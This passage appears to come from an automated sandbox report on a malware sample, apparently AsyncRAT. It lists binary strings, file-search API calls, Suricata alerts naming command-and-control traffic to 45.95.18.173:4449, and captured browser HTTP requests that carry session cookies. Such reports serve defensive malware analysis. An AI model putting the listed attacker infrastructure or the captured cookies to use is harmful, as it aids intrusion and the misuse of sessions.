00000025.00000002.2068427148.0000012CE08AD000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2072299199.0000012CE18A5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2069784689.0000012CE0EA7000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2065673413.0000012CDFCAF000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2071296730.0000012CE14A1000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2065176277.0000012CDFAB0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2064620170.0000012CDF8B3000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2066598163.0000012CE00A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local StateB source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local Statev source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\Local State source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: a\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062State source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local StateQ source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062Z source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1706127726.0000012CDEE4F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665993469.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705642796.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1704853715.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local State source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\47114209A62F3B9930F6B8998DFD4A991\Local State source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE27000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: G\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\Local State0F2 source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: curcuma.exe, 00000025.00000002.2067051232.0000012CE02AE000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2062028723.0000012CDF0B2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2067503246.0000012CE04AA000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2070281440.0000012CE10A9000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2064043968.0000012CDF6BA000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2063400094.0000012CDF4B9000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2068870239.0000012CE0AAC000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2070779946.0000012CE12A5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2067953052.0000012CE06A4000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2062689732.0000012CDF2B2000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2071810365.0000012CE16A1000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2069313603.0000012CE0CA6000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2066142942.0000012CDFEA6000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2068427148.0000012CE08AD000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2072299199.0000012CE18A5000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2069784689.0000012CE0EA7000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2065673413.0000012CDFCAF000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2071296730.0000012CE14A1000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2065176277.0000012CDFAB0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2064620170.0000012CDF8B3000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2066598163.0000012CE00A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: x\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: curcuma.exe, 00000025.00000003.1665087028.0000012CDEE82000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbx source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\47114209A62F3B9930F6B8998DFD4A991\Local StateLvA source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE27000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\Local State source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000001A.00000000.1139585263.0000000000502000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: winload_prod.pdb@0 source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062* source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665993469.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705642796.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1704853715.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062 source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665993469.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705642796.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1704853715.0000012CDEE4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\36C00AF489401A26639ABBA698DE76062\Local State source: curcuma.exe, 00000025.00000003.1704640245.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1705370093.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdbs source: curcuma.exe, 00000025.00000003.1665355347.0000012CDEE54000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ogFiles\0F2\en-US source: curcuma.exe, 00000025.00000003.1665166422.0000012CDEE47000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\ADFoyxP.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0082A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_0082A087
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0082A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,23_2_0082A1E2
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0081E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,23_2_0081E472
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0082A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,23_2_0082A570
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_007EC622 FindFirstFileExW,23_2_007EC622
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_008266DC FindFirstFileW,FindNextFileW,FindClose,23_2_008266DC
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_008273D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,23_2_008273D4
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_00827333 FindFirstFileW,FindClose,23_2_00827333
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0081D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,23_2_0081D921
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0081DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,23_2_0081DC54
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\353090\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\353090Jump to behavior
Source: chrome.exeMemory has grown: Private usage: 6MB later: 93MB

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 45.95.18.173:4449 -> 192.168.11.20:49724
Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 45.95.18.173:4449 -> 192.168.11.20:49722
Source: global trafficTCP traffic: 192.168.11.20:49722 -> 45.95.18.173:4449
Source: Joe Sandbox ViewIP Address: 20.125.62.241 20.125.62.241
Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox ViewASN Name: SHOCK-1US SHOCK-1US
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49727 -> 104.21.96.1:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49726 -> 104.21.96.1:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49725 -> 104.21.96.1:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:62579 -> 104.21.96.1:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:60783 -> 104.21.96.1:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:51492 -> 104.21.96.1:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:57795 -> 104.21.96.1:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:60838 -> 104.21.96.1:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:60839 -> 104.21.96.1:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:60840 -> 104.21.96.1:443
Source: unknownTCP traffic detected without corresponding DNS query: 96.16.68.63
Source: unknownTCP traffic detected without corresponding DNS query: 104.90.245.116
Source: unknownTCP traffic detected without corresponding DNS query: 35.186.224.24
Source: unknownTCP traffic detected without corresponding DNS query: 96.16.68.63
Source: unknownTCP traffic detected without corresponding DNS query: 96.16.68.63
Source: unknownTCP traffic detected without corresponding DNS query: 35.186.224.24
Source: unknownTCP traffic detected without corresponding DNS query: 104.90.245.116
Source: unknownTCP traffic detected without corresponding DNS query: 40.79.197.34
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.103.220
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.103.220
Source: unknownTCP traffic detected without corresponding DNS query: 40.79.197.34
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.103.220
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.103.220
Source: unknownTCP traffic detected without corresponding DNS query: 20.59.87.225
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.190.193
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.103.220
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.190.193
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.190.193
Source: unknownTCP traffic detected without corresponding DNS query: 20.59.87.225
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.103.220
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.190.193
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.190.193
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.190.193
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.103.220
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.103.220
Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.190.193
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.190.193
Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknownTCP traffic detected without corresponding DNS query: 69.192.139.84
Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknownTCP traffic detected without corresponding DNS query: 45.95.18.173
Source: unknownTCP traffic detected without corresponding DNS query: 23.221.103.220
Source: C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.comCode function: 23_2_0082D889 InternetReadFile,SetEvent,GetLastError,SetEvent,23_2_0082D889
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlaHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlaHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgfycGL7HrL4GIjAhmMFMPH8wUKNr0bEtYM3LnQPsGF3J5h98t4VT4GecfiJQS2W_-ag002XOc99_7xoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=IVojWvzg6TUyKJVw0ku_QR3hPubqVuwe0yb4y4b-YIRsbXqlvFf4nf8hHcIJ1ezCk3DLcehLC-_5Gg1-eTlFENuF2t0DqMXXbVfN2CESIJWKoxrg2MoLaGmryadsX7Ff1GoLgL7-rmtQQBll9jCp-FFqmSeF3EAn4BWA9GOJ8HgICHnqGGsPvqV6deB-Ps1gO_KrS_reNHfeikY
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgfycGL7HrL4GIjAmpIoRwQKUszb_kOodZXKTvmHkevR-Cd2RnhaUlOi-F-4Uf63dtl_aaApMYLDB-XMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlaHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=OsvFMy0TgwoJRxbHC4JnqoCvr3qemCRmPKC10ZSZhhfE86TZBsQU7VmemVGgjpeaVwzhIP47Yf26Vw-fhI5OqagPGudTV5bsgbXftG8iKYPpr9wqdTXgk2ItVVq0oLoQ5j87AUXdpaRxR1HURODf7wyOT8W3s2tmAfN_fdfEOUZKBw_BpnUZlZ4bhCxKImP1clIgZtmnPqN0XjU
Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.867cdfd625d830718faf.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Device-Memory: 8Origin: https://ntp.msn.comsec-ch-ua-model: rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "94.0.992.31"sec-ch-ua-platform-version: "10.0.0"downlink: 1.3sec-ch-ua-bitness: "64"ect: 4gsec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_ETH=1; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=CE27969BA8D74822BE092FFEAAAF385A.RefC=2025-03-07T16:50:12Z; USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; MUIDB=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.948ffa5ea2d441a35f55.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"Device-Memory: 8sec-ch-ua-model: rtt: 200sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "94.0.992.31"sec-ch-ua-platform-version: "10.0.0"downlink: 1.45sec-ch-ua-bitness: "64"ect: 4gsec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNHP_U531Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _C_ETH=1; sptmarket=en-US||us|en-us|en-us|en||cf=8|RefA=CE27969BA8D74822BE092FFEAAAF385A.RefC=2025-03-07T16:50:12Z; USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; MUIDB=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1
